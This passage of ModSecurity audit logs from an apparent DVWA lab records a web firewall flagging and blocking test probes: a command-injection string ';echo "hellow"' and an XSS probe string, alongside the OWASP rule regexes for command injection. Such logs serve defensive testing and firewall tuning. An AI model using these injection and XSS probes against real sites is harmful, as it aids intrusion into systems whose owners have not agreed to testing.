\"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRc1q38AAQEAAAkZ0BoAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Warning. Pattern match \"(?:;|\\\\\\\\\\\\\\\\{|\\\\\\\\\\\\\\\\||\\\\\\\\\\\\\\\\|\\\\\\\\\\\\\\\\||&|&&|\\\\\\\\\\\\\\\\n|\\\\\\\\\\\\\\\\r|\\\\\\\\\\\\\\\\$\\\\\\\\\\\\\\\\(|\\\\\\\\\\\\\\\\$\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\(|`|\\\\\\\\\\\\\\\\${|<\\\\\\\\\\\\\\\\(|>\\\\\\\\\\\\\\\\(|\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\s*\\\\\\\\\\\\\\\\))\\\\\\\\\\\\\\\\s*(?:{|\\\\\\\\\\\\\\\\s*\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\s*|\\\\\\\\\\\\\\\\w+=(?:[^\\\\\\\\\\\\\\\\s]*|\\\\\\\\\\\\\\\\$.*|\\\\\\\\\\\\\\\\$.*|<.*|>.*|\\\\\\\\\\\\\\\\'.*\\\\\\\\\\\\\\\\'|\\\\\\\\\".*\\\\\\\\\")\\\\\\\\\\\\\\\\s+|!\\\\\\\\\\\\\\\\s*|\\\\\\\\\\\\\\\\$)*\\\\\\\\\\\\\\\\s*(?:'|\\\\\\\\\")*(?:[\\\\\\\\\\\\\\\\?\\\\\\\\\\\\\\\\*\\\\\\\\\\\\\\\\[\\\\\\\\\\\\\\\\]\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\)\\\\\\\\\\\\\\\\-\\\\\\\\\\\\\\\\|+\\\\\\\\\\\\\\\\w'\\\\\\\\\"\\\\\\\\\\\\\\\\./\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\]+/)?[\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'\\\\\\\\\"]*(?:l[\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'\\\\\\\\\"]* ...\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"81\"] [id \"932100\"] [rev \"4\"] [msg \"Remote Command Execution: Unix Command Injection\"] [data \"Matched Data: ;echo \\\\\\\\x22hellow found within ARGS:ip: ;echo \\\\\\\\x22hellow\\\\\\\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"8\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-unix\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRc1q38AAQEAAAkZ0BoAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Warning. Pattern match \"(?i)(?:;|\\\\\\\\\\\\\\\\{|\\\\\\\\\\\\\\\\||\\\\\\\\\\\\\\\\|\\\\\\\\\\\\\\\\||&|&&|\\\\\\\\\\\\\\\\n|\\\\\\\\\\\\\\\\r|`)\\\\\\\\\\\\\\\\s*[\\\\\\\\\\\\\\\\(,@\\\\\\\\\\\\\\\\'\\\\\\\\\"\\\\\\\\\\\\\\\\s]*(?:[\\\\\\\\\\\\\\\\w'\\\\\\\\\"\\\\\\\\\\\\\\\\./]+/|[\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'\\\\\\\\\"\\\\\\\\\\\\\\\\^]*\\\\\\\\\\\\\\\\w[\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'\\\\\\\\\"\\\\\\\\\\\\\\\\^]*:.*\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\|[\\\\\\\\\\\\\\\\^\\\\\\\\\\\\\\\\.\\\\\\\\\\\\\\\\w '\\\\\\\\\"/\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\]*\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\)?[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*(?:m[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*(?:y[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*s[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*q[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*l(?:[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*(?:d[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*u[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*m[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*p(?:[\\\\\\\\\"\\\\\\\\\\\\\\\\^]*s[\\\\\\\\\"\\\\\\\\\\\\\\\\^ ...\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"185\"] [id \"932110\"] [rev \"4\"] [msg \"Remote Command Execution: Windows Command Injection\"] [data \"Matched Data: ;echo found within ARGS:ip: ;echo \\\\\\\\x22hellow\\\\\\\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-windows\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRc1q38AAQEAAAkZ0BoAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRc1q38AAQEAAAkZ0BoAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=10,PHPI=0,HTTP=0,SESS=0): Remote Command Execution: Windows Command Injection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRc1q38AAQEAAAkZ0BoAAAAE\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":486,"p2":2438,"p3":0,"p4":0,"p5":199,"sr":64,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:35:09 --0400","transaction_id":"WRc1vX8AAQEAAAkVV40AAAAA","remote_address":"127.0.0.1","remote_port":42148,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 16:32:22 GMT","If-None-Match":"\"1f8-54f6a5dd13646\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:35:06 GMT","ETag":"\"246-54f6a67947f4a\"","Accept-Ranges":"bytes","Content-Length":"582","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc1vX8AAQEAAAkVV40AAAAA\"]"],"stopwatch":{"p1":442,"p2":1043,"p3":63,"p4":147,"p5":60,"sr":18,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:35:09 --0400","transaction_id":"WRc1vX8AAQEAAAkVV44AAAAA","remote_address":"127.0.0.1","remote_port":42148,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc1vX8AAQEAAAkVV44AAAAA\"]"],"stopwatch":{"p1":386,"p2":863,"p3":44,"p4":254,"p5":108,"sr":17,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:35:09 --0400","transaction_id":"WRc1vX8AAQEAAAkVV48AAAAA","remote_address":"127.0.0.1","remote_port":42148,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc1vX8AAQEAAAkVV48AAAAA\"]"],"stopwatch":{"p1":340,"p2":955,"p3":44,"p4":240,"p5":51,"sr":15,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:37:12 --0400","transaction_id":"WRc2OH8AAQEAAAkW4R8AAAAB","remote_address":"127.0.0.1","remote_port":42158,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 16:35:06 GMT","If-None-Match":"\"246-54f6a67947f4a\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:37:11 GMT","ETag":"W/\"246-54f6a6f09244d\"","Accept-Ranges":"bytes","Content-Length":"582","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc2OH8AAQEAAAkW4R8AAAAB\"]"],"stopwatch":{"p1":549,"p2":1260,"p3":57,"p4":146,"p5":54,"sr":17,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:37:46 --0400","transaction_id":"WRc2Wn8AAQEAAAkXs@kAAAAC","remote_address":"192.168.75.153","remote_port":39276,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/xss_s/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/exec/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1632","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_s/\"] [unique_id \"WRc2Wn8AAQEAAAkXs@kAAAAC\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":624,"p2":2604,"p3":115,"p4":704,"p5":107,"sr":27,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:37:46 --0400","transaction_id":"WRc2Wn8AAQEAAAkXs@oAAAAC","remote_address":"192.168.75.153","remote_port":39276,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/xss_s/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/exec/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1632","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_s/\"] [unique_id \"WRc2Wn8AAQEAAAkXs@oAAAAC\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":704,"p2":2487,"p3":111,"p4":516,"p5":78,"sr":30,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:38:22 --0400","transaction_id":"WRc2fn8AAQEAAAkYuFUAAAAD","remote_address":"192.168.75.153","remote_port":39278,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"POST /dvwa/vulnerabilities/xss_s/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/xss_s/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive","Content-Type":"application/x-www-form-urlencoded","Content-Length":"109"},"body":["txtName=%27%27%3B%21--%22%3CXS&mtxMessage=%27%27%3B%21--%22%3CXSS%3E%3D%26%7B%28%29%7D&btnSign=Sign+Guestbook"]},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"316","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/xss_s/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected XSS using libinjection. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"56\"] [id \"941100\"] [rev \"2\"] [msg \"XSS Attack Detected via libinjection\"] [data \"Matched Data: content-length found within ARGS:mtxMessage: '';!--\\x22<XSS>=&{()}\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag 